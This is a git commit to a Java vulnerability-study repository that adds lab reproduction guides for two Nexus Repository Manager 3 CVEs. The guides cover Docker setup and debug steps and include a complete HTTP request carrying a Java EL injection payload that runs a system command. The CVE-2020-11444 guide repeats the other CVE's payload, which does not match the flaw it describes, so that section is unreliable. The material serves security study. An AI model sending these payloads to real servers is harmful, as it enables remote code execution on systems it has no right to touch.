feat:添加nexus

Author: “threedr3am”

nexus/CVE-2020-10204/README.md

@@ -0,0 +1,57 @@
+CVE-2020-10204 Nexus Repository Manager 3
+
+影响版本：<= 3.21.1
+Affected Versions:  All previous Nexus Repository Manager 3.x OSS/Pro versions up to and including 3.21.1
+
+Fixed in Version:  Nexus Repository Manager OSS/Pro version 3.21.2
+
+### 1. 拉取镜像
+```
+docker pull sonatype/nexus3:3.21.1
+```
+
+### 2. 创建nexus数据目录
+```
+mkdir /your-dir/nexus-data && chown -R 200 /your-dir/nexus-data
+```
+
+### 3. 运行nexus docker镜像
+```
+docker run -d --rm -p 8081:8081 -p 5050:5050 --name nexus -v /your-dir/nexus-data:/nexus-data -e INSTALL4J_ADD_VM_PARAMS="-Xms2g -Xmx2g -XX:MaxDirectMemorySize=3g  -Djava.util.prefs.userRoot=/nexus-data -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050" sonatype/nexus3::3.21.1
+```
+
+### 4. github下载源码 & idea远程debug
+```
+git clone https://github.com/sonatype/nexus-public.git
+git checkout -b release-3.21.0-05 origin/release-3.21.0-05
+```
+idea创建远程debug-启动
+```
+-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050
+```
+漏洞点在 org.sonatype.nexus.common.template.EscapeHelper#stripJavaEl 被绕过
+
+### 5. 登陆任何一个账号
+
+### 6. 调用更新role接口
+数据包：
+```
+POST /service/extdirect HTTP/1.1
+Host: 127.0.0.1:8081
+Content-Length: 301
+accept: application/json
+Sec-Fetch-Dest: empty
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+NX-ANTI-CSRF-TOKEN: 0.16936373694860252
+Content-Type: application/json
+Origin: http://127.0.0.1:8081
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.16936373694860252; NXSESSIONID=4e5437b3-7755-4784-bda6-d004e8f589fb
+Connection: close
+
+{"action":"coreui_User","method":"update","data":[{"userId":"www","version":"2","firstName":"www","lastName":"www","email":"[email protected]","status":"active","roles":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}"]}],"type":"rpc","tid":9}
+```

nexus/CVE-2020-11444/README.md

@@ -0,0 +1,59 @@
+CVE-2020-11444 Nexus Repository Manager 3
+
+影响版本：<= 3.21.2
+Affected Versions:  All previous Nexus Repository Manager 3 OSS/Pro versions up to and including 3.21.2
+
+Fixed in Version:  Nexus Repository Manager OSS/Pro version 3.22.0
+
+### 1. 拉取镜像
+```
+docker pull sonatype/nexus3:3.21.2
+```
+
+### 2. 创建nexus数据目录
+```
+mkdir /your-dir/nexus-data && chown -R 200 /your-dir/nexus-data
+```
+
+### 3. 运行nexus docker镜像
+```
+docker run -d --rm -p 8081:8081 -p 5050:5050 --name nexus -v /your-dir/nexus-data:/nexus-data -e INSTALL4J_ADD_VM_PARAMS="-Xms2g -Xmx2g -XX:MaxDirectMemorySize=3g  -Djava.util.prefs.userRoot=/nexus-data -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050" sonatype/nexus3::3.21.2
+```
+
+### 4. github下载源码 & idea远程debug
+```
+git clone https://github.com/sonatype/nexus-public.git
+git checkout -b release-3.21.0-05 origin/release-3.21.0-05
+```
+idea创建远程debug-启动
+```
+-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050
+```
+漏洞点在 org.sonatype.nexus.security.internal.rest.UserApiResource#changePassword 接口
+
+新版本在 org.sonatype.nexus.security.internal.DefaultSecuritySystem#changePassword(java.lang.String, java.lang.String, boolean) 修复
+
+### 5. 登陆任何一个账号
+
+### 6. 调用更新role接口
+数据包：
+```
+POST /service/extdirect HTTP/1.1
+Host: 127.0.0.1:8081
+Content-Length: 301
+accept: application/json
+Sec-Fetch-Dest: empty
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+NX-ANTI-CSRF-TOKEN: 0.16936373694860252
+Content-Type: application/json
+Origin: http://127.0.0.1:8081
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.16936373694860252; NXSESSIONID=4e5437b3-7755-4784-bda6-d004e8f589fb
+Connection: close
+
+{"action":"coreui_User","method":"update","data":[{"userId":"www","version":"2","firstName":"www","lastName":"www","email":"[email protected]","status":"active","roles":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}"]}],"type":"rpc","tid":9}
+```

nexus/pom.xml

@@ -0,0 +1,15 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+  <parent>
+    <artifactId>learn-java-bug</artifactId>
+    <groupId>com.xyh</groupId>
+    <version>1.0-SNAPSHOT</version>
+  </parent>
+  <modelVersion>4.0.0</modelVersion>
+
+  <artifactId>nexus</artifactId>
+
+
+</project>

pom.xml

@@ -23,6 +23,7 @@
     <module>cas</module>
     <module>ShardingSphere-UI</module>
     <module>shiro</module>
+    <module>nexus</module>
   </modules>
 
   <name>learn-java-bug</name>